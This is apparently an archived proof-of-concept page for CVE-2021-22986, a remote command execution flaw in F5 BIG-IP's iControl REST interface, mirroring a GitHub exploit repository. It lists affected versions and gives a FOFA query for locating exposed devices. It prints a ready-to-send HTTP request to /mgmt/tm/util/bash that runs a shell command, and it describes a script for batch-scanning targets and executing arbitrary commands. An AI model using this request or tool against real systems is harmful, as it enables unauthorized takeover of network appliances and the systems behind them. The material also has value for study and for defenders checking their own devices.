Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-22986 PoC — F5 BIG-IP 代码问题漏洞

Source
https://github.com/yaunsky/CVE-202122986-EXP
Associated Vulnerability
Title:F5 BIG-IP 代码问题漏洞 (CVE-2021-22986)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在安全漏洞,该漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。
Description
F5 BIG-IP远程代码执行;cve-2021-22986,批量检测;命令执行利用
Readme
# F5 BIG-IP 远程命令执行漏洞(CVE-2021-22986)

## 漏洞影响

F5 BIG-IP 16.x: 16.1.0.3

F5 BIG-IP 15.x: 15.1.0.4

F5 BIG-IP 14.x: 14.1.2.6

F5 BIG-IP 13.x: 13.1.3.4

F5 BIG-IP 12.x: 12.1.5.2

F5 BIG-IP 11.x: 11.6.5.2

## fofa

icon_hash="-335242539"

## POC

```
POST /mgmt/tm/util/bash HTTP/1.1
Host: xxx.xxx.xxx.xxx:8443
Connection: close
Content-Length: 41
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}
```

## 脚本使用

python3 CVE202122986.py --help

```bash
Usage: CVE202122986.py [OPTIONS]

Options:
  -u, --url TEXT   Target URL,对单一目标检测; Example:python3 CVE202122986.py -u https://ip:port

  -f, --file TEXT  Target File,对批量目标检测; Example:python3 CVE202122986.py -f ip.txt

  -c, --cmd TEXT   Target command,命令执行; Example: python3 CVE202122986.py -cmd id

  --help           Show this message and exit.
```
File Snapshot

 [4.0K]  /data/pocs/479863f347c0ce8a50685bec7cb023ca97e36119
├── [3.4K]  CVE202122986.py
├── [1.0K]  F5 BIG-IP 远程命令执行漏洞(CVE-2021-22986).md
└── [1010]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.